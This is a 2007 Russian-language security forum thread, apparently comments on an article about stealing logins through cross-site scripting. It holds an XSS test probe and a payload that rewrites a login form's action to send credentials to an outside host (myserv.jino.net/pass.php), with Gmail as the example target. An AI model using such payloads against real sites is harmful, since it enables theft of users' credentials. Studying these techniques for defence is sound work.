HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.08.2007, 16:13
bulbazaur
Участник форума
Регистрация: 10.09.2006
Сообщений: 160
Провел на форуме:
619440

Репутация: 96
Отправить сообщение для bulbazaur с помощью ICQ
По умолчанию

блин ответте мне
 

  #2  
Старый 08.08.2007, 00:17
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

Цитата:
Сообщение от bulbazaur  
блин ответте мне
Во-первых более подробно опиши ситуацию,
во-вторых внимательно перечитай статью.
Из твоего примера, я понял что ты пытаешься провести xss там, где его нет (gmail.com). Обязательным условием реализации метода, является наличие xss на атакуемом сервере!
 

  #3  
Старый 08.08.2007, 01:04
bulbazaur
Участник форума
Регистрация: 10.09.2006
Сообщений: 160
Провел на форуме:
619440

Репутация: 96
Отправить сообщение для bulbazaur с помощью ICQ
По умолчанию

Получается, такую фичу можно проделать только с сайтом, у которого хсс в полях входа? а как тогда определить, есть там хсс или нет?
 

  #4  
Старый 08.08.2007, 20:58
bulbazaur
Участник форума
Регистрация: 10.09.2006
Сообщений: 160
Провел на форуме:
619440

Репутация: 96
Отправить сообщение для bulbazaur с помощью ICQ
По умолчанию

2 neval
я знаю что такое хсс, и даже представь себе, знаю что такое сниффер. просто как проверить логин на хсс? алерта же никак не будет...
 

  #5  
Старый 09.08.2007, 00:17
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

Цитата:
Сообщение от bulbazaur  
2 neval
я знаю что такое хсс, и даже представь себе, знаю что такое сниффер. просто как проверить логин на хсс? алерта же никак не будет...
Проверяется, так же как всегда например (если нет фильтров): "><script>alert("xss");</script>, если сработает алерт, то есть xss.
Но вообще в статье приведен только лишь пример с уязвимым полем логин, на самом деле уязвимость может присутствовать в любом месте страницы, например в поиске. При этом метод будет работать, необходимо чтобы уязвимость присутствовала именно на странице с формой аутентификации.
 

  #6  
Старый 09.08.2007, 00:52
bulbazaur
Участник форума
Регистрация: 10.09.2006
Сообщений: 160
Провел на форуме:
619440

Репутация: 96
Отправить сообщение для bulbazaur с помощью ICQ
По умолчанию

ладно, спасибо т.е. допустим на гугло.мейле есть поиск с хсс, причем должен быть именно гет запрос, да? так вот, будет ли это тогда работать?
Цитата:
http://www.gmail.com/auth.html?login=“><script>document.auth.action=
‘http://myserv.jino.net/pass.php’</script>
 

  #7  
Старый 09.08.2007, 00:57
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

Цитата:
Сообщение от bulbazaur  
ладно, спасибо т.е. допустим на гугло.мейле есть поиск с хсс, причем должен быть именно гет запрос, да? так вот, будет ли это тогда работать?
да, только код с подменой обработчика
Код:
“><script>document.auth.action=
‘http://myserv.jino.net/pass.php’</script>
необходимо подставлять в уязвимый параметр, а не в логин.
 

  #8  
Старый 24.06.2007, 15:01
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

Цитата:
Сообщение от Solide Snake  
Хоть бы написал где картинки брал) А так статья норм
Картинки сам в Визио рисовал - часа два парился! В нете таких больше нет!
Да, и большая просьба не писать, что не ново, я сам об этом в начале статьи написал, лучше конструктивное обсуждение, предложения и замечания!

Последний раз редактировалось [53x]Shadow; 24.06.2007 в 21:39..
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Ответьте на вопросы Legion342 PHP 5 22.11.2007 14:03
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ